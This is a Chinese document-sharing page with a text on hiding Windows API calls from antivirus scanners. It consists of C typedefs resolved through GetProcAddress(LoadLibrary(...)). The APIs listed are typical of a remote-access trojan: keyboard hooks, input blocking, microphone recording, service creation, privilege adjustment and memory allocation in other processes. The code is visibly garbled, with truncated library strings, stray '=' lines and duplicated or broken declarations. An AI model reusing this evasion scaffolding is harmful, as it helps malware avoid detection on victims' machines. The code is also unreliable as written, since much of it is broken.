版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
本文格式为Word版,下载可任意编辑——源码免杀动态调用例子
杀毒查杀的API函数调用列子:
typedefUINT(WINAPI*GetSystemDirectoryAT)(
__out_ecount_part_opt(uSize,return+1)LPSTRlpBuffer,__inUINTuSize);
GetSystemDirectoryAT
typedefBOOL(WINAPI*HeapFreeT)(
__inoutHANDLEhHeap,__inDWORDdwFlags,
__derefLPVOIDlpMem);
HeapFreeTpHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*ReleaseMutexT)(
__inHANDLEhMutex);
ReleaseMutexTpReleaseMutex
(ReleaseMutexT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*VirtualProtectT)(
__inLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflNewProtect,__outPDWORDlpflOldProtect);VirtualProtectT
pVirtualProtect
=
(VirtualProtectT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetModuleFileNameAT)(
__in_optHMODULEhModule,
__out_ecount_part(nSize,return+1)LPCHlpFilename,__inDWORDnSize
pGetSystemDirectoryA=
(GetSystemDirectoryAT)GetProcAddress(LoadLibrary(\
=
);
GetModuleFileNameATpGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary(\WINAPI
typedefBOOL(WINAPI*CopyFileAT)(
__inLPCSTRlpExistingFileName,__inLPCSTRlpNewFileName,__inBOOLbFailIfExists);
CopyFileATpCopyFileA(CopyFileAT)GetProcAddress(LoadLibrary(\
typedefVOID(WINAPI*LeaveCriticalSectionT)(
__inoutLPCRITICAL_SECTIONlpCriticalSection);
LeaveCriticalSectionTpLeaveCriticalSection(LeaveCriticalSectionT)GetProcAddress(LoadLibrary(\
typedefSC_HANDLE(WINAPI*OpenSCManagerAT)(
__in_optLPCSTRlpMachineName,__in_optLPCSTRlpDatabaseName,__inDWORDdwDesiredAccess);
OpenSCManagerAT
pOpenSCManagerA
(OpenSCManagerAT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*AdjustTokenPrivilegesT)(
__inHANDLETokenHandle,
=
==
__inBOOLDisableAllPrivileges,
__in_optPTOKEN_PRIVILEGESNewState,__inDWORDBufferLength,__out_bcount_part_opt(BufferLength,*ReturnLength)PreviousState,
__out_optPDWORDReturnLength);
AdjustTokenPrivilegesTpAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(\\PTOKEN_PRIVILEGES
;
typedefBOOL(WINAPI*SetFileAttributesAT)(
__inLPCSTRlpFileName,__inDWORDdwFileAttributes);
SetFileAttributesATpSetFileAttributesA(SetFileAttributesAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetTempPathAT)(
__inDWORDnBufferLength,
__out_ecount_part(nBufferLength,return+1)LPSTRlpBuffer);
GetTempPathATpGetTempPathA(GetTempPathAT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*InternetCloseHandleT)(
__inHINTERNEThInternet);
InternetCloseHandleTpInternetCloseHandle(InternetCloseHandleT)GetProcAddress(LoadLibrary(\
typedefINTERNETAPI_(HINTERNET*InternetOpenUrlAT)(
__inHINTERNEThInternet,__inLPCSTRlpszUrl,
__in_ecount_opt(dwHeadersLength)LPCSTRlpszHeaders,
=
=
=
__inDWORDdwHeadersLength,__inDWORDdwFlags,
__in_optDWORD_PTRdwContext);
InternetOpenUrlATpInternetOpenUrlA(InternetOpenUrlAT)GetProcAddress(LoadLibrary(\
typedefHINTERNET(WINAPI*InternetOpenUrlAT)(
__inHINTERNEThInternet,
__inLPCSTRlpszUrl,
__in_ecount_opt(dwHeadersLength)LPCSTRlpszHeaders,__inDWORDdwHeadersLength,__inDWORDdwFlags,
__in_optDWORD_PTRdwContext);
InternetOpenUrlATpInternetOpenUrlA(InternetOpenUrlAT)GetProcAddress(LoadLibrary(\
typedefLRESULT(WINAPI*CallNextHookExT)(
__in_optHHOOKhhk,__inintnCode,
__inWPARAMwParam,__inLPARAMlParam);CallNextHookExT
pCallNextHookEx
(CallNextHookExT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*BlockInputT)(
BOOLfBlockIt);
BlockInputTpBlockInput
(BlockInputT)GetProcAddress(LoadLibrary(\
typedefSERVICE_STATUS_HANDLE(WINAPI*RegisterServiceCtrlHandlerAT)(
__inLPCSTRlpServiceName,__in__callback
LPHANDLER_FUNCTIONlpHandlerProc);
=
=
==
RegisterServiceCtrlHandlerATpRegisterServiceCtrlHandlerA=
(RegisterServiceCtrlHandlerAT)GetProcAddress(LoadLibrary(\rlHandlerA\
typedefBOOL(WINAPI*PostMessageAT)(
__in_optHWNDhWnd,__inUINTMsg,
__inWPARAMwParam,__inLPARAMlParam);
PostMessageATpPostMessageA(PostMessageAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*WaitForSingleObjectT)(
__inHANDLEhHandle,
__inDWORDdwMilliseconds);
WaitForSingleObjectT
pWaitForSingleObject
=
(WaitForSingleObjectT)GetProcAddress(LoadLibrary(\
typedefHANDLE(WINAPI*CreateToolhelp32SnapshotT)(
DWORDdwFlags,
DWORDth32ProcessID);
CreateToolhelp32SnapshotTpCreateToolhelp32Snapshot=(CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(\apshot\
typedefBOOL(WINAPI*SetThreadDesktopT)(
__inHDESKhDesktop);SetThreadDesktopT
=
pSetThreadDesktop=
(SetThreadDesktopT)GetProcAddress(LoadLibrary(\
);
VirtualFreeTpVirtualFree
(VirtualFreeT)GetProcAddress(LoadLibrary(\
typedef__bcount(dwSize)LPVOID(WINAPI
*VirtualAllocT)(
__in_optLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflAllocationType,__inDWORDflProtect);VirtualAllocT
pVirtualAlloc
==
(VirtualAllocT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*SHGetSpecialFolderPathT)(HWNDhwnd,LPSTRpszPath,intcsidl,BOOLfCreate);
SHGetSpecialFolderPathTpSHGetSpecialFolderPath=(SHGetSpecialFolderPathT)GetProcAddress(LoadLibrary(\erPath\
HMODULEmHodule=LoadLibrary(\
typedefBOOL(WINAPI*SHGetSpecialFolderPathT)(HWNDhwnd,LPSTRpszPath,int
csidl,BOOLfCreate);SHGetSpecialFolderPathT
pSHGetSpecialFolderPath=(SHGetSpecialFolderPathT)GetProcAddress(mHodule,\ialFolderPathA\
typedefBOOL(WINAPI*SHGetSpecialFolderPathAT)(HWNDhwnd,LPSTRpszPath,intcsidl,BOOLfCreate);
SHGetSpecialFolderPathATpSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary(\ialFolderPathA\
typedefHGDIOBJ(WINAPI*GetStockObjectT)(__ininti);
GetStockObjectTpGetStockObject(GetStockObjectT)GetProcAddress(LoadLibrary(\
typedefint(WINAPIV*wsprintfAT)(
__outLPSTR,
__in__format_stringLPCSTR,...);wsprintfAT
pwsprintfA
(wsprintfAT)GetProcAddress(LoadLibrary(\
typedef__out
HANDLE(WINAPI*CreateEventAT)
(
__in_optLPSECURITY_ATTRIBUTESlpEventAttributes,__inBOOLbManualReset,__inBOOLbInitialState,__in_optLPCSTRlpName
);CreateEventATpCreateEventA(CreateEventAT)GetProcAddress(LoadLibrary(\
typedef__out
LPSTR(WINAPI*lstrcatAT)(
__inoutLPSTRlpString1,__inLPCSTRlpString2);lstrcatATplstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SetFilePointerT)(
__inHANDLEhFile,
__inLONGlDistanceToMove,__in_optPLONGlpDistanceToMoveHigh,__inDWORDdwMoveMethod);SetFilePointerT
pSetFilePointer
=
=
=
=
(SetFilePointerT)GetProcAddress(LoadLibrary(\
typedefDWORD_PTR(WINAPI*SHGetFileInfoAT)
(LPCSTRpszPath,DWORDdwFileAttributes,SHFILEINFOA*psfi,UINTcbFileInfo,UINTuFlags);
SHGetFileInfoAT
pSHGetFileInfoA
=
(SHGetFileInfoAT)GetProcAddress(LoadLibrary(\
typedefBOOL(VFWAPI*ICSeqCompressFrameStartT)(
INPCOMPVARSpc,INLPBITMAPINFOlpbiIn);
ICSeqCompressFrameStartTpICSeqCompressFrameStart=(ICSeqCompressFrameStartT)GetProcAddress(LoadLibrary(\FrameStart\
typedefLPVOID(VFWAPI*ICSeqCompressFrameT)(
INPCOMPVARSpc,INUINTuiFlags,INLPVOIDlpBits,OUTBOOLFAR*pfKey,
INOUTLONGFAR*plSize);
ICSeqCompressFrameTpICSeqCompressFrame=(ICSeqCompressFrameT)GetProcAddress(LoadLibrary(\\
typedefLRESULT(VFWAPI*ICSendMessageT)(
INHIChic,
INUINTmsg,
INDWORD_PTRdw1,INDWORD_PTRdw2);
ICSendMessageT
typedefHIC(VFWAPI*ICOpenT)(
INDWORDfccType,
pICSendMessage=
(ICSendMessageT)GetProcAddress(LoadLibrary(\
INDWORDfccHandler,
INUINTwMode);
ICOpenTpICOpen=(ICOpenT)GetProcAddress(LoadLibrary(\
typedefLRESULT(VFWAPI*ICCloseT)(
INHIChic);
ICCloseTpICClose=(ICCloseT)GetProcAddress(LoadLibrary(\
typedefvoid(VFWAPI*ICCompressorFreeT)(
INPCOMPVARSpc);
ICCompressorFreeTpICCompressorFree
(ICCompressorFreeT)GetProcAddress(LoadLibrary(\
typedefvoid(VFWAPI*ICSeqCompressFrameEndT)(
INPCOMPVARSpc);
ICSeqCompressFrameEndT
=
pICSeqCompressFrameEnd=
(ICSeqCompressFrameEndT)GetProcAddress(LoadLibrary(\ameEnd\
typedef__out
HANDLE(WINAPI*GetProcessHeapT)(VOID);
GetProcessHeapTpGetProcessHeap
(GetProcessHeapT)GetProcAddress(LoadLibrary(\
typedefSIZE_T(WINAPI*LocalSizeT)(
__inHLOCALhMem);
LocalSizeTpLocalSize
(LocalSizeT)GetProcAddress(LoadLibrary(\
=
=
typedefBOOL(WINAPI*CloseDesktopT)
(
__inHDESKhDesktop);CloseDesktopTpCloseDesktop
(CloseDesktopT)GetProcAddress(LoadLibrary(\
typedefHDESK(WINAPI*OpenDesktopAT)(
__inLPCSTRlpszDesktop,__inDWORDdwFlags,__inBOOLfInherit,
__inACCESS_MASKdwDesiredAccess);OpenDesktopATpOpenDesktopA
(OpenDesktopAT)GetProcAddress(LoadLibrary(\
typedefint(WINAPI*SHCreateDirectoryExAT)(HWNDhwnd,LPCSTRpszPath,SECURITY_ATTRIBUTES*psa);SHCreateDirectoryExAT
pSHCreateDirectoryExA
=
(SHCreateDirectoryExAT)GetProcAddress(LoadLibrary(\A\
typedefHINSTANCE(WINAPI*ShellExecuteAT)
(HWNDhwnd,LPCSTRlpOperation,LPCSTRlpFile,LPCSTRlpParameters,LPCSTRlpDirectory,INTnShowCmd);
ShellExecuteATpShellExecuteA(ShellExecuteAT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveOutUnprepareHeaderT)
(INHWAVEOUThwo,INOUTLPWAVEHDRpwh,INUINTcbwh);waveOutUnprepareHeaderTpwaveOutUnprepareHeader
===
=
(waveOutUnprepareHeaderT)GetProcAddress(LoadLibrary(\ader\
typedefMMRESULT(WINAPI*waveInUnprepareHeaderT)(INHWAVEINhwi,INOUTLPWAVEHDRpwh,UINTcbwh);waveInUnprepareHeaderT
pwaveInUnprepareHeader
=
(waveInUnprepareHeaderT)GetProcAddress(LoadLibrary(\r\
typedefMMRESULT(WINAPI*waveInAddBufferT)
(INHWAVEINhwi,INOUTLPWAVEHDRpwh,INUINTcbwh);
waveInAddBufferTpwaveInAddBuffer
(waveInAddBufferT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveInStartT)(INHWAVEINhwi);
waveInStartT
pwaveInStart
=
(waveInStartT)GetProcAddress(LoadLibrary(\
typedefMMRESULT(WINAPI*waveInOpenT)(OUTLPHWAVEINphwi,INUINTuDeviceID,
INLPCWAVEFORMATEXpwfx,INDWORD_PTRdwCallback,INDWORD_PTRdwInstance,INDWORDfdwOpen);
waveInOpenTpwaveInOpen
(waveInOpenT)GetProcAddress(LoadLibrary(\
typedef__out
HANDLE(WINAPI*OpenProcessT)(
__inDWORDdwDesiredAccess,__inBOOLbInheritHandle,__inDWORDdwProcessId);
OpenProcessT
pOpenProcess
===
(OpenProcessT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*GetCurrentThreadIdT)(
VOID);
GetCurrentThreadIdT
pGetCurrentThreadId
=
(GetCurrentThreadIdT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*GetCursorPosT)(
__outLPPOINTlpPoint);GetCursorPosT
pGetCursorPos=
(GetCursorPosT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*SetProcessWindowStationT)(
__inHWINSTAhWinSta);
SetProcessWindowStationT
pSetProcessWindowStation
=
(SetProcessWindowStationT)GetProcAddress(LoadLibrary(\ation\
typedef__bcount(dwSize)
LPVOID(WINAPI*VirtualAllocExT)(
__inHANDLEhProcess,__in_optLPVOIDlpAddress,__inSIZE_TdwSize,
__inDWORDflAllocationType,__inDWORDflProtect);
VirtualAllocExT
pVirtualAllocEx
(VirtualAllocExT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SHDeleteKeyT)(HKEY,LPCTSTR);SHDeleteKeyT
pSHDeleteKey
(SHDeleteKeyT)GetProcAddress(LoadLibrary(\
typedefDWORD(WINAPI*SizeofResourceT)(
__in_optHMODULEhModule,__inHRSRChResInfo);
SizeofResourceTpSizeofResource(SizeofResourceT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*CloseHandleT)(
__inHANDLEhObject);
=
=
=
CloseHandleTpCloseHandle(CloseHandleT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*FindCloseT)(
__inoutHANDLEhFindFile);
FindCloseTpFindClose
(FindCloseT)GetProcAddress(LoadLibrary(\
typedefSC_HANDLE(WINAPI*CreateServiceAT)(
__inSC_HANDLEhSCManager,__inLPCSTRlpServiceName,__in_optLPCSTRlpDisplayName,__inDWORDdwDesiredAccess,__inDWORDdwServiceType,__inDWORDdwStartType,__inDWORDdwErrorControl,
__in_optLPCSTRlpBinaryPathName,
__in_optLPCSTRlpLoadOrderGroup,__out_optLPDWORDlpdwTagId,__in_optLPCSTRlpDependencies,__in_optLPCSTRlpServiceStartName,__in_optLPCSTRlpPassword);
CreateServiceAT
pCreateServiceA
(CreateServiceAT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*GetVolumeInformationAT)(
__in_optLPCSTRlpRootPathName,
__out_ecount_opt(nVolumeNameSize)LPSTRlpVolumeNameBuffer,__inDWORDnVolumeNameSize,
__out_optLPDWORDlpVolumeSerialNumber,
__out_optLPDWORDlpMaximumComponentLength,__out_optLPDWORDlpFileSystemFlags,
=
=
=
__out_ecount_opt(nFileSystemNameSize)LPSTRlpFileSystemNameBuffer,
__inDWORDnFileSystemNameSize);GetVolumeInformationATpGetVolumeInformationA=(GetVolumeInformationAT)GetProcAddress(LoadLibrary(\olumeInformationA\
typedefBOOL(WINAPI*CreateDirectoryAT)(
__inLPCSTRlpPathName,__in_optLPSECURITY_ATTRIBUTESlpSecurityAttributes);
CreateDirectoryAT
pCreateDirectoryA
(CreateDirectoryAT)GetProcAddress(LoadLibrary(\
typedef__out
HLOCAL(WINAPI*LocalReAllocT)(__inHLOCALhMem,__inSIZE_TuBytes,__inUINTuFlags
);
LocalReAllocTpLocalReAlloc
(LocalReAllocT)GetProcAddress(LoadLibrary(\
typedefHDESK(WINAPI*OpenInputDesktopT)(
__inDWORDdwFlags,
__inBOOLfInherit,
__inACCESS_MASKdwDesiredAccess);
OpenInputDesktopTpOpenInputDesktop
(OpenInputDesktopT)GetProcAddress(LoadLibrary(\
typedefBOOL(WINAPI*AdjustTokenPrivilegesT)(
__inHANDLETokenHandle,__inBOOLDisableAllPrivileges,
__in_optPTOKEN_PRIVILEGESNewState,
=
=
=
__inDWORDBufferLength,__out_bcount_part_opt(BufferLength,PreviousState,
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 摇船调教学设计小学音乐三年级下册人音版(主编:曹理)
- 湘艺版五年级下册溜溜山歌教案及反思
- 废旧锂电池石墨回收方案
- 雨水沉淀池清淤维护方案
- 水生态流量控制方案
- 2026年光学薄膜行业分析报告及未来发展趋势报告
- 楼梯维护保养方案
- 金矿废气治理方案
- 2026年转播车行业分析报告及未来发展趋势报告
- 2026年明杆弹性座封闸阀行业分析报告及未来发展趋势报告
- 纵隔肿瘤诊疗指南(2025年版)
- 侦察兵战术课件
- 《茶道与茶艺(第4版)》课件 第12章 科学饮茶
- 夜市运营方案
- 五公里武装越野教案
- 消防工程从入门到精通
- YDT 5102-2024 通信线路工程技术规范
- 地质局面试题库及答案
- T-GDPPS 025-2025 小火蚁监测与防控技术规程
- 非物质文化遗产歙县(汪满田、瞻淇、渔梁)鱼灯制作技艺
- 云南省2024-2025学年高一上学期期末(学业水平合格性考试)物理试卷(含答案)
评论
0/150
提交评论